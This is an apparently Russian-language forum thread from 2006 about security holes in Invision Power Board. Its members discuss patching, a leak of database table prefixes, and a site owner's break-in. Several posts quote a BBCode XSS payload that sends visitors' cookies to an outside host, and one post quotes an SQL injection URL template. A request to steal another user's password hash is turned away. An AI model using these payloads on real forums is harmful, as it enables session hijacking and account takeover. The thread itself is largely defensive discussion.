xRay Опубликовано 26 Марта 2006 Жалоба Поделиться Опубликовано 26 Марта 2006 Вопрос на засыпкувот от эту XSS заткнули? [po*st=1000[to*pic=target style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st] И вообще по вот этому треду что думаем?_http://forum.antichat.ru/thread15678.html И еще в кач-ве фотки в профиле можно залить н.р. вот это r57shell 1.24 (тута _http://rst.void.ru/)Как будем боротся? Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 26 Марта 2006 Жалоба Поделиться Опубликовано 26 Марта 2006 Вопрос на засыпкувот от эту XSS заткнули? [po*st=1000[to*pic=target style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st] И вообще по вот этому треду что думаем?_http://forum.antichat.ru/thread15678.html И еще в кач-ве фотки в профиле можно залить н.р. вот это r57shell 1.24 (тута _http://rst.void.ru/)Как будем боротся?Было год назад. Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 28 Марта 2006 Жалоба Поделиться Опубликовано 28 Марта 2006 Нестандартные префиксы в какой то мере спасают от скрипткиддисов. Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил. Таким образом считай что они написаны в лого твоего форума черным по белому. Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 29 Марта 2006 Жалоба Поделиться Опубликовано 29 Марта 2006 Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил.А можно ещё раз для пропустивших? Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 29 Марта 2006 Жалоба Поделиться Опубликовано 29 Марта 2006 Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил.А можно ещё раз для пропустивших? SELECT j.post_id, p.journal_id, m.name FROM test_jtracker j LEFT JOIN test_jposts p ON ( j.post_id = p.pid ) LEFT JOIN test_members m ON (m.id = p.journal_id) GROUP BY j.post_id HAVING j.post_id>0 AND m.name IS NULL ORDER BY m.name ASC в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.Сам заметил случайно, когда в примере писал тестовые префиксы, а после публикации сообщения вылезли другие, совсем не те, что указывал в примере кода, как оказалось это были реальные префиксы. На 2.1.4-5 эта штука уже не работает или что-то было сделано дополнительно. Кто-то тут говорил, что баг этот на уровне абстракции к базе или что-то такое. Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 29 Марта 2006 Жалоба Поделиться Опубликовано 29 Марта 2006 где смотреть то? Ссылка на комментарий Поделиться на других сайтах Прочее
Dr.Freddy Опубликовано 29 Марта 2006 Жалоба Поделиться Опубликовано 29 Марта 2006 в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.Не верю © Проверил на своей 2.0.4 — не работает. Покажите, пожалуйста, кусок кода, который влечет за собой автозамену участков постинга данными подключения к базе данных. Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 29 Марта 2006 Жалоба Поделиться Опубликовано 29 Марта 2006 в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.Не верю © Проверил на своей 2.0.4 — не работает. Покажите, пожалуйста, кусок кода, который влечет за собой автозамену участков постинга данными подключения к базе данных. Как защитить форум от взлома? кажется тут эта тема обсуждалась. Причем прикол в том, что на этом форуме тоже работало на момент создания темы. У меня на 2.0.4 после последних двух исправлений безопасности и смены серверного ПО тоже перестало работать, но возможность такая была и где-то вполне возможно, что работает. Ссылка на комментарий Поделиться на других сайтах Прочее
sanches36 Опубликовано 31 Марта 2006 Жалоба Поделиться Опубликовано 31 Марта 2006 Кто что скажет http://ivdb.org/poc/1337.htm Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 31 Марта 2006 Жалоба Поделиться Опубликовано 31 Марта 2006 sanches36, это не уязвимость форума. Ссылка на комментарий Поделиться на других сайтах Прочее
replicant Опубликовано 2 Апреля 2006 Жалоба Поделиться Опубликовано 2 Апреля 2006 Кто что скажет http://ivdb.org/poc/1337.htm Это проблемы писателей модов, к форуму отношение косвенное, но не более того. Мой совет - уберите мод или пишите автору. Ссылка на комментарий Поделиться на других сайтах Прочее
IPBD Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Помогите плиз ! Надо узнать пароль одного пользователя на форуме IPB . Долго читать просто . Понял что надо в личку написать сообщние и получаешь его pass_hash из cookie .Так какое сообщение надо написать ( sound и video тэгов нет ) . Версия IPB :Powered by: Invision Power Board (Free Trial) v2.0.1 © 2006 Invision Power Services, Inc.Get your free trial here! Ссылка на комментарий Поделиться на других сайтах Прочее
Dr.Freddy Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Иди отсюда, мальчик. Ссылка на комментарий Поделиться на других сайтах Прочее
IPBD Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 А вроде форум про хаки , взломы и уязвимости ... Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 А вроде форум про хаки , взломы и уязвимости ...а) форум про движок IPBб) если нужна информация о уязвимостях, то читай тему с самого начала и ничего не пропускайв) если интересуют взлом форума или другие противозаконные действия - добро пожаловать на securitylab.ru или ещё куда-нибудь, но подальше отсюда Ссылка на комментарий Поделиться на других сайтах Прочее
Lenar Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Люди добрые, помогите! У меня стоит версия 2.0.4 и сегодня я обнаружил, что в группе Администраторы появился еще один юзер. Обновления безопасности никогда не ставил. Только моды. Как можно узнать по какому способу меня взломали? Что первым делом можно посмотреть? Какие следы могли остаться? Доступ к сайту я пока закрыл на пароль (в админке хостинга). Ссылка на комментарий Поделиться на других сайтах Прочее
Mokkey Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Lenar Мой Вам совет: начинайте ставить все обновления безопасность - нет смысла узнавать, как был произведен взлом и закрывать только эту дырку, если завтра все может повториться через другую уязвимость... Установка всех обновлений - это безусловная необходимость. Иначе незачем вообще думать о безопасности. Ссылка на комментарий Поделиться на других сайтах Прочее
Lenar Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Mokkey, спасибо. А те уязвимости, которые указаны в этом топике полные или где-то еще можно посмотреть? Может где-то есть все уязвимости сразу, чтобы не искать по одному? Ссылка на комментарий Поделиться на других сайтах Прочее
Bebson Опубликовано 14 Апреля 2006 Жалоба Поделиться Опубликовано 14 Апреля 2006 Каюсь, внимательно прочел только половину топика, до стр. 14 из 29. Побежал ставить заплатки на 1.3.1. Вроде все поставил. Это я к тому, что мой форум немного потрепали. Вот таким образом:a href='mailto:<a href='http://wj`=`' target='_blank'></a>'><a href='http://wj`=`' target='_blank'></a></a>[/color] span style='color:white'>` style=`background:url(java script:document.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`</spanВот что значит год без заплаток Дочитываю топик Ссылка на комментарий Поделиться на других сайтах Прочее
toha Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 http://exploit.in/modules.php?name=News&fi...iew&news_id=907 Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 http://exploit.in/modules.php?name=News&fi...iew&news_id=907Утка. Уязвимость была закрыта значительно раньше, чем написано на сайте, что она вообще была открыта. SQL-injection в Invision Power Board 2.1.x(discovered by red_byte) Недавно, поковыряв сорсы IPB, я обнаружил уязвимость в модуле ?act=Online, который выводит статистику юзеров, которые сейчас находятся на форуме. Проблема состоит в том, что переменная st не фильтруется должным образом. Возникает возможность внедрения SQL-инъекции. http://victim/index.php?act=Online&st=-1[your_sql_code_here]Надо отметить, что данная бага присутствует на таких популярных форумах как Web-Hack и DamageLab.Гыы =) Афтар-то у нас со знанием дела! Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 Вопрос на засыпку как мог зарегится пользователь с IP 127.0.0.1?(в форуме на движке IPB 2.0.х) Ссылка на комментарий Поделиться на других сайтах Прочее
Anthony Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 Вопрос на засыпку как мог зарегится пользователь с IP 127.0.0.1?(в форуме на движке IPB 2.0.х)Иногда я себя видел в списке он-лайн с таким IP. Ссылка на комментарий Поделиться на других сайтах Прочее
xRay Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 AnthonyНу а по существу мысли есть? Ссылка на комментарий Поделиться на других сайтах Прочее
.silent Опубликовано 18 Апреля 2006 Жалоба Поделиться Опубликовано 18 Апреля 2006 может, бэкап побывал на локалке?или хостер? O.o Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения